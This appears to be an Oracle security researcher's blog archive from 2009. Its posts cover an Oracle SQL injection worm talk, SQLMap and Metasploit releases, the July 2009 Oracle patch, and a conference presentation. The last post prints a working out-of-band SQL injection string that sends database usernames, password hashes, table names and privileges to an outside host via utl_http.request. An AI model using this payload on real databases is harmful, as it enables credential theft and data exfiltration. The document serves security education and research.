Archive of the SQL Injection category

Defcon Presentation about an Oracle Worm, oap_hacker and bsqlbf

Sumit Siddharth has published his Defcon presentation about “The Making of Second SQL Injection Worm (Oracle Edition)”.

Sumit describes the differences between SQL Injection and PL/SQL Injection and presents his tool “oap_hacker.pl”, which allows running OS commands via Java. oap_hacker.pl and Bsqlbf v.2.3 use a PL/SQL Injection bug in dbms_export_extension (the old one, not the new one that was fixed with the CPU July 2009).

BTW, the (underground) tool darkORASQLi.py for dumping data from Oracle databases also uses the dbms_export_extension vulnerability to run OS commands.

A demo of his Oracle worm ora_w0rm.pl is available on YouTube.

Here are some screenshots showing how a client PC that accesses an Oracle system infected by the worm is taken over:

[Screenshots: Oracle Worm 1 to 4]

Very interesting work. Thanks Sumit for this presentation.

Oracle & Metasploit Presentation from Blackhat USA are already online

The Oracle & Metasploit material (PDF, slides) from Chris Gates' talk at the Blackhat 2009 conference is already online. A short review will follow tomorrow.

SQLMap 0.7-1 released

Bernardo Damele has released a new version of his SQL Injection tool, SQLMap 0.7.1. This version comes with new features like support for Mac OSX and support for Metasploit wrapping functions, plus several bugfixes (changelog).

Oracle CPU July 2009 published

Yesterday night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products; 10 security issues are fixed in the Oracle Database Server. As always, the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.

The 3 most critical bugs this time are related to the TNS Listener, and one of the bugs can be exploited without authentication. These issues (CVE-2009-1020, CVE-2009-1019, CVE-2009-1963) are rated with CVSS 9 (for Windows) and 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-)):

  • SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
  • Information Disclosure (Password Hash) in Database Vault
  • Information Disclosure (Password Hash) in Audit Vault

More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.

Presentation from Confidence 2009 available

I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search for credit card numbers in the database (using dbms_xmlgen), and more. Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we get all usernames/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http.request(...))) in the SELECT clause: every row of each data dictionary view is sent out as an HTTP request, and because sum(length(...)) is a number, all the subselects can be added together into one numeric expression.

http://victim.com/order.jsp?id=17' or 1=((select sum(length(utl_http.request('http://www.orasploit.com/'||username||'='||password))) from dba_users)
+(select sum(length(utl_http.request('http://www.orasploit.com/'||owner||'='||table_name))) from dba_tables)
+(select sum(length(utl_http.request('http://www.orasploit.com/'||owner||'='||table_name||'='||column_name))) from dba_tab_columns)
+(select sum(length(utl_http.request('http://www.orasploit.com/'||grantee||'='||granted_role))) from dba_role_privs)
+(select sum(length(utl_http.request('http://www.orasploit.com/'||grantee||'='||owner||'='||table_name||'='||privilege||'='||grantable))) from dba_tab_privs))--